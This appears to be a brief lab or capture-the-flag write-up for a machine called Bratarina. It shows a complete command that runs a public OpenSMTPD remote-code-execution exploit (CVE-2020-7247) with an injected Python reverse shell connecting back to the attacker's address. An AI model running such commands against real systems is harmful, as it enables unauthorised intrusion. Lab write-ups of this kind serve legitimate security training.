Bratarina

Exploitation


Last updated 2 years ago

According to our scans, Bratarina is running OpenSMTPD 2.0, which makes this machine a good candidate for the RCE.

In order to get the exploit to work, we had to use the principle of using the same thing, just in different ways.

I ran the following command to get a reverse shell.

python3 /usr/share/exploitdb/exploits/linux/remote/47984.py 192.168.242.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.242\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'

I also found this exploit on GitHub, which seems to be really good as well.

GitHub - QTranspose/CVE-2020-7247-exploit: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution PoC exploit
Exploit Database - OpenSMTPD 6.6.1 - Remote Code Execution